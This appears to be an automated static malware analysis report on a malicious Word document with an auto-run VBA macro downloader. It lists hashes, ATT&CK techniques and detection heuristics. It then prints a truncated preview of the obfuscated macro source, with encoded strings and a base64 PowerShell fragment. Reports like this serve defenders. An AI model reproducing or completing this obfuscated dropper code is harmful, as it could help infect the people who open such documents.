Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8650d5078695584e…

MALICIOUS

Office (OLE)

225.0 KB Created: 2018-04-03 21:59:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 3bad2e587bc0310eaae43b3ba0d2cb16 SHA-1: eb57ef7c30cd8860e0d09b1f6122e5380fdd3ef5 SHA-256: 8650d5078695584e260e073f4e55c015cb5c62fdede33a0089e37ab1b4c00f40
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and utilizes CreateObject to likely download and execute a second-stage payload, as indicated by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic. The ClamAV detection further confirms its malicious nature. The macro code itself is heavily obfuscated, preventing a more detailed analysis of its specific actions or the exact URL it contacts.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 38325 bytes
SHA-256: e07303ce277b6b1836a7bc99277809a9153d0625e79d9a910d9f7e85b871844d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kjJmjwCVAHFUNa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IkhumzWmiNqv"
Function aDPoQiizUWqFwP()
On Error Resume Next
sIbds = 36919 * 54664
DYWHrU = (90749 + CDate(3735 / Atn(wECik)) / 51218 * iZISp * 77091 * CInt(ffuUJi) * uULjKY / CSng(cDSMK))
zsNXIi = Tan(35439)
VDVYZr = PlGPtl("@m%2X7TL7Innx30Hs6d08b4l7sd5Ht/l9Df6s7L7ol3xOc930d4Yp/i8tXPi8wz3wD/Y0eI82BH3B7uJiVKOp", 4, 76)
SKKmPp = 82221 * 53772
AlTVCk = (83870 + CDate(90458 / Atn(BDCVpF)) / 60760 * jmSXLb * 30946 * CInt(bJBzuj) * AFSbq / CSng(zIVch))
OwzUEG = Tan(33155)
PvRQch = 54810 * 81329
rWZqJj = (55901 + CDate(99330 / Atn(Dldaw)) / 71914 * wYtjv * 7710 * CInt(PmEiw) * hhZMw / CSng(XfMjwi))
ZJQWpz = Tan(60889)
bbAWU = PlGPtl("qNvG7Z8QfdgZ7n9m9G2f+WT7tnJx+xvtWzuwOigvWZ/jb2nOnc3fm78zihvvMPvjhzY+x8poxvvxuUyV/GfeY/yvgLO0PbgJ8Ib7AzTPshX+5xf8EvLm4b5G+r209mn8b4GJn+w7IC/Y72z/V+1dbV/a95Rl+1ZbPV+arV", 4, 160)
dIjGCn = 17063 * 19577
EEjkm = (42089 + CDate(23449 / Atn(bCNsl)) / 84578 * BJiEzQ * 28921 * CInt(QXDYqF) * FOVIbs / CSng(AmnEF))
wRwrQ = Tan(73230)
OVoaNR = 37671 * 67279
wzHWwR = (63071 + CDate(41113 / Atn(tziUzh)) / 1282 * jEAcP * 12836 * CInt(wpQcO) * JUGks / CSng(iuNMS))
POfGt = Tan(44383)
zwwai = PlGPtl("D63F5Z7k753wulM+xI/JX+qOGetffUl4ga5iv6Cuqsg/xHUjvgaPgIehm+y59CbxkSu/tfJ+lC4wnmC/Wkn3Uk8VM,", 7, 82)
ZzhPi = 7022 * 62502
kaHBEH = (89451 + CDate(69721 / Atn(XkFHSV)) / 43359 * hIAsqp * 92637 * CInt(UoEbFY) * MiwUGL / CSng(MVdCj))
SzHcL = Tan(45074)
dqBAt = 18355 * 42316
BvuBVr = (83073 + CDate(74313 / Atn(BwDYVP)) / 18434 * coIlM * 73346 * CInt(JaMqz) * pwJof / CSng(qNXwk))
hmROwH = Tan(50247)
CFOlzQD = PlGPtl("5%QB,xW8CfGUXmI/l+Zn/N7", 6, 16)
jQVNzo = 18005 * 44359
uiAodM = (5235 + CDate(88415 / Atn(qzSDFp)) / 45122 * fzGud * 9891 * CInt(GSYav) * qJTVcU / CSng(rDZOUN))
cYfKf = Tan(81657)
FEvWwH = 81916 * 61723
CWwQdB = (19082 + CDate(19883 / Atn(GTLFc)) / 53440 * AcmPmO * 44587 * CInt(uUSFPw) * huwrWU / CSng(TIIOl))
PdzbTX = Tan(95720)
pvdaiow = PlGPtl("n4lE76TR1gJfezlVHptu6/tJKNwjX3Ryl/xHUtyrWhW/1/wjiqf8ZlgmPnvNT6gOs6+x9X/ct53ie67s5t0z/s7RJBzL+CcfUV0lXQm/wf4Qgiw5", 7, 103)
ERwnzw = 43833 * 18007
EvDNlQ = (18115 + CDate(72536 / Atn(idJdG)) / 44880 * YkQUqm * 83432 * CInt(OddwD) * VAJYE / CSng(ildMp))
OtUVaK = Tan(51490)
iYQoPz = 74367 * 57657
tpNpY = (63568 + CDate(20463 / Atn(cIArL)) / 77110 * JIhPEr * 33774 * CInt(iHqwri) * pUYJw / CSng(shhYK))
NcBsSk = Tan(48250)
jEMUuWwKC = PlGPtl("%sBERT]::FroMbaSE64StrING( 'TVhdc+JGEPwrPKTKkMpRIODy8bYEFVZyK07YSkpc3QNHyBpj7JTtsmzX/fjsdPfKftpCWuRD5G", 4, 95)
HRXZIb = 86334 * 58322
hkSSbS = (61329 + CDate(34649 / Atn(pmQbA)) / 82080 * EDUhPY * 23160 * CInt(DtYwz) * WMOzz / CSng(rUmJVa))
vmOjQ = Tan(63082)
KmLfNv = 48889 * 64277
oTdJsl = (89233 + CDate(55280 / Atn(ajEpIX)) / 59909 * dTLGHa * 50674 * CInt(FsPnt) * LvFSA / CSng(LuhCdd))
EqUdo = Tan(1196)
vVpMGj = PlGPtl("SKNRfwEHkAewYNL22/4LFivS8QdvJjyGv1s33B7lF/e7M1k10H5fUFeEm4r2st,m", 6, 57)
RGWohs = 6687 * 99648
tfpzIV = (17245 + CDate(69028 / Atn(XjXjlI)) / 55123 * OVSlOa * 74905 * CInt(AFZRk) * sMHoX / CSng(fDjhkm))
RGiUN = Tan(22985)
QSnjvH = 89697 * 30188
OjhaK = (30013 + CDate(67403 / Atn(HWFbE)) / 79522 * EHPvN * 75517 * CInt(IWGCcI) * HomHj / CSng(ojwbQ))
NjwvYM = Tan(56335)
qqNJYpuzEI = PlGPtl("db/04kHa6aS3fpLYfL", 2, 12)
inrzB = 44273 * 61762
KUImaq = (530 + CDate(66383 / Atn(TYZkY)) / 17287 * iQaCLa * 66267 * CInt(zumTwm) * JjNVi / CSng(dWWjO))
EnDdGi = Tan(5809)
DodiK = 53901 * 78249
zcSzf = (98744 + CDate(72209 / Atn(zauHkf)) / 91418 * chlON * 12753 * CInt(JlwiSm) * FwDjQ / CSng(kntSA))
OcpOkX = Tan(86589)
iBjEvPDtP = PlGPtl(",4h9ueq7UPwq8+NZ9YXVB9Z7POcZuMO9TrxxFD7e8uMD7fCIa6P3FfGGulJ+nJ1TK06oI/Ab66kxXph0dUHRM8n@S", 3, 80)
Fdqaw = 85384 * 74846
LiQSz = (76684 + CDate(40649 / Atn(EEPdmp)) / 76712 * OfrMT * 44019 * CInt(LZiEc) * dhXfa / CSng(KBhjaH))
KfH
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.